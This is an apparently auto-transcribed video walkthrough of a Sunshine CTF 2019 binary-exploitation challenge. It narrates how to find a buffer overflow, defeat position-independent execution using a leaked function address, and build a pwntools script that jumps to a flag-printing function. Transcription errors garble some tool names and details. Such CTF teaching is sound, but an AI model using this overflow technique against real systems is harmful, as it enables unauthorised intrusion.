 What's going on everybody? My name is Jon Hammond and we're looking again at Sunshine CTF 2019, the game hosted by B-Sides Orlando, put together by the hack UCF guys. So great game. Checking out the Pwn category. I do not normally venture into these dark, dark wells because I'm a noob and not that good, but I did manage to get Return of Mania done and over with. So 50 points. Challenge Prompt is to celebrate her new return to wrestling. Caps and Overflow authored this challenge to enter the ring. Okay, so we have a binary to download and a net cat session that we can connect to. So let's just put together a little connect.sh script because I like to do that just encapsulate stuff and I don't have to remember the actual IP address and port. We can connect to it good and let's go ahead and download the binary because I would rather work with that. Let's copy that link location, let's W get it here and let's check out what we've got. Okay, it doesn't want me to do that. I'll just go ahead and save it. Okay, now I have the file downloaded. We have Return to Mania right here. It is a L32 bit LSB shared object, blah, blah, blah. Not stripped. Cool. Okay, so let's go ahead and execute it. Mark is executable anyway and let's go ahead and run it. Return to Mania. Welcome to WrestleMania. Type in key to get access. Address of welcome is that type in key. Okay, key. Sadly as a result of capital overflow won't be entering the ring yet. Okay, so I'll do basic file reconnaissance before we get into regular reverse engineering and stuff like that. Blah strings on it, etc, etc. Oh, flag dot text. Welcome to the ring, etc. Okay, will L trace work on that? Return to Mania. Hello. Nope. What about S trace? Anything worthwhile? Reads and inputs? Hello? Right? Well, in WrestleMania. No. Okay. Whatever. Let's fire up Gidra then. So I've got Gidra in my op directory in the Gidra. And let's go ahead and Gidra run. Okay, I've got Gidra open now. Let's create just a dummy project. New in yeah, anything, I guess. I don't really care where it goes. I just want Gidra to work. So it's fire up the dragon here. Cool. And it's an I to import. And we want return to Mania in Sun ZDF. Okay, great. Go ahead and import it. Yes. It's probably going to want to analyze it. So let's analyze everything good. And I don't know if I can make this font much bigger. I know I can actually we've done it before in the stream. Tool options. Decompiler display. Okay. Font size. Let's go like 16. Maybe that's better. And listing display. Mono space. Let's go 16. Okay. Apply on those. Cool. Okay. Might be a little bit easier to read now. Fingers crossed. Okay. Yeah, so let's just go ahead and search for main. Let's get the main function up here. And looks like in the decompilation, what this does is it runs welcome. And then sadly, as a result, cabinet overflow won't be entering the ranges yet. Okay, so what does welcome do? Let's click on him. Welcome to WrestleMania type in the key to get access. Okay, print of address of welcome. Welcome. And then it runs skin f so it tries to read in something. And this must be a buffer 14 bytes. Okay, let's rename that. Let's just call it our input. And skin f. So we want to be able to get to mania. What is mania? Is mania a function? I know I saw it in here. Yeah, mania is a function. Welcome to the ring. And then it has a flag handle. Won't hurt out. And then it gets okay, so it will read the flag. Yeah, so this this if we would rename these just so it makes sense, we have flag buffer as a buffer of 40 characters, and then the stream that we're opening it up and we'll display it out. So it will read the flag and put it on the screen for us. Okay, so that makes sense. We have to be able to call mania. So scan f I'm assuming is going to be an over an overflow a buffer overflow. It gives us the address of welcome, though, and that was weird to me. I don't know why. So let's go ahead and check this out with checksack. So checksack part of home tools. Let's run it on return to mania. It looks like PIE or position independent execution position independent code is enabled, which is probably why they're giving us the address of welcome. Because that is going to differ every single time we run it, right? Yes, address of welcome changes, changes, changes. So position independent code and position independent executable is that it's going to have a change where the actual program functions are when you're running the program. The same way ASLR will kind of randomize the stack. ASLR address space layout randomization. And that will help that that struggles you to find positions of things in memory. This this PIE position independent code and executable from what I understand will help randomize the locations of the functions that are being called and ran within the program. So if I were to read elf tack s on return to mania, what I'm going to be seeing for the value is not where that function is anymore in memory, it's actually going to be an offset as to where it would be. So we can check out, okay, the main function is here. And the welcome function is here relative to some random start starting position. Same thing with mania. That's relative to some random starting position. So we can figure this out, right? If we wanted to be able to call mania, do we actually have a buffer overflow? Let's try and use Pone cyclic. And I know the buffer was like 14. So let's go to like 40. Yep. And let's go ahead and sorry, pace of that. Echo that into our return to mania program. We get a seg fault, dmessage check out where it is. Let's dmessage tail that and blah, blah, blah, return to mania seg fault at this. So when you're using Pone cyclic, you can say Pone cyclic and the length to generate that cyclic pattern. Then you can say Pone cyclic tack L to look up. And then you want to have this in 32 bits. So you want to have four hex values here. And then zero x to specify that that is hex Pone cyclic will find it at 22. So now that tells us that the offset to where we're going to be able to control EIP and actually control our buffer overflow is 22 characters in. So we'll use Python taxi to print out 22 a's, right? And we would go ahead and pump that to our return to mania program. We get a segmentation fault, check out dmessage. And that returns a trap here because it doesn't know where to particularly go next. But if we were to give it some values after that, like let's say bbbb, we go ahead and get our overflow. And it's trying to jump to segfalt that 42424242 or all of our b's. So we can control now the return address as to where it's going to go. Problem is position independent code, position independent executable. We don't know where mania is going to be. Or even welcome or anything except the program tells us the address of welcome. So if that is at a random position and I'll just start to put together our scripts, but I want to have this make sense to you here. If address of welcome is equal to a random start plus, it was zero x and then what was all that stuff? Let's read Elf tack s again on return to mania. Welcome was over at this address. And mania was over at this address all with an offset, right? Address of mania is now going to equal random start plus that. Good. We've got some information because we also know the address of welcome is given to us when we run the program. So if we were to run return to mania address of welcome is at this position, we can say address of welcome equals that. But we should know that that varies dependent on what the program gives us, right? So let's just say what program gives, how about program gives? Good. So now we can solve this kind of like a system of equations, right? Random start is common in both of these. So let's go ahead and set these in terms of random start. If we had random start will equal address of welcome minus that. So now random start equals that. We'll do the same thing down here. Using some algebra, let's go ahead and subtract these. And then say random start is equal to that. Now we can say, oh, random start is equal to this and equal to this. So let's put these together. Address of welcome is equal to address of mania, just like that. Does that make sense? So now because we know address of welcome, we can substitute that in address of welcome is going to be that. So now we can solve this for address of mania. Let's go ahead and say address of mania should equal all that. So I think my numbers are off here, though. Oh, right, because I when I'm putting address of mania in there, I'm adding this. Okay, so now we can say address of mania is going to be what the program gives minus this information. And we'll just use idle to crank that out. Oh, sorry, negative negative that minus 144. Okay. So program gives minus 144. That's our address of mania. All we really did when we did that was try to find the difference between these offsets, right? So 0x5d minus 0 6 Ed is negative 144. I just kind of wanted to showcase how that all works, maybe in a mathematical way that's thorough in your understanding. But given this information, you can figure this out, we just have to get address of welcome carved out of that. So let's go and work with us. Now we have a dot pi. So let's create a script. Let's say user bin environment Python. Get our shebang line in there. I'm going to use the Pone Tools library from Pone import all. And let's say our elf can equal an elf file of return to mania. And let's say the process P can equal elf dot process. So we want to see what we've got here so far. Let's print P dot receive. I think that'll give us the information that we need, right? Let's Python ape welcome Russell mania. And it looks like it's hanging. So maybe too many extra receipts here. What we can do is we can split this up. Let's split this up by a new line. And let's get the last line. And then let's split it by 0x. Maybe Yeah, I think that's fair. I'll go ahead and kill the hex part for us to because we need to get rid of that. So now what have we got? We got the address. Cool. Why does it have a space in there? Oh, it's not getting it at all. I'm a I'm stupid. Sorry. So let's see what we got. It has an extra new line. Does it? Yeah, address of welcome is now in there. So now we can split on 0x. This is what we've done before. And let's get our negative one. So we get that hex portion. Great. Okay. So address of welcome equals that. And that's an int base 16. So now we have the address of welcome. So that means the address of mania is just that address of welcome minus 144, right? So let's go ahead and create an actual P 32 will do that for us and with Pone tools, that P 32 function will take an integer and then convert it into that little ending and format that we need. So let's say our payload is going to equal 22 a's right because that was the offset that we found with our Pone cyclic. And then we need the actual function that we want to jump to. So payload it can plus equal. We want to give it's P 32 32 bit and the actual address of many that we're working with. So now we can say P dot send line payload and let's go interactive just to see if we got anything working with us. Let's go ahead and run this and P has no attribute interactive. Excuse me. Let's just do Oh, because I didn't have an eye and interactive. There we go. Welcome to ring flag dot text no such file or directory. So we've got our exploit working. We've jumped to the mania function. And we can go ahead and redirect this now to whatever our connect function actually or connect script actually tells us to we can say no longer do I want to work with the binary. I want to go ahead and say P equals a remote connection to this host with that port. And we should be able to just get a real flag. Let's crank through this. There we go. Welcome to the ring sun overflow run wild brother. We did it. So that was that that was a buffer overflow that we were able to take advantage of with position independent executable on because it was willing to tell us what the welcome function where it was. We could use that smart return to libc mindset as you find the offset from something to get you to another thing. That's I think why this challenge was called return to mania is because you're just determining based off of a random starting position, you can still determine with the offsets what the other thing is. So that's that. There is our flag. Let's go ahead and submit that and you get that 50 points. Good stuff. Thank you guys for watching. Hope you enjoyed this. If you did like this video, please do like comment and subscribe. Love to see you in the discord server. Love to see you on Patreon. Love to see you on PayPal. Thank you guys so much for watching. I can't say it enough. See you in the next video.